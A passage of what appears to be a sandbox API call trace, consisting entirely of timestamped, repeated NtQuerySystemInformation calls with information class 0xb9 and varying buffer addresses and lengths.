Length=0x0, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe040, Length=0x20, ResultLength=0x0) [0189.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe040, Length=0x20, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe040, Length=0x20, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe070, Length=0x20, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe010, Length=0x20, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe010, Length=0x20, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdef0, Length=0x28, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x28, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x28, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfb8, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x48, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x28, ResultLength=0x0) [0189.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x28, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0e0, Length=0x40, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x28, ResultLength=0x0) [0189.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0189.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x20, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x50, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0189.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x28, ResultLength=0x0) [0189.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x38, ResultLength=0x0) [0189.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x28, ResultLength=0x0) [0189.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.659] NtQuerySystemInformation 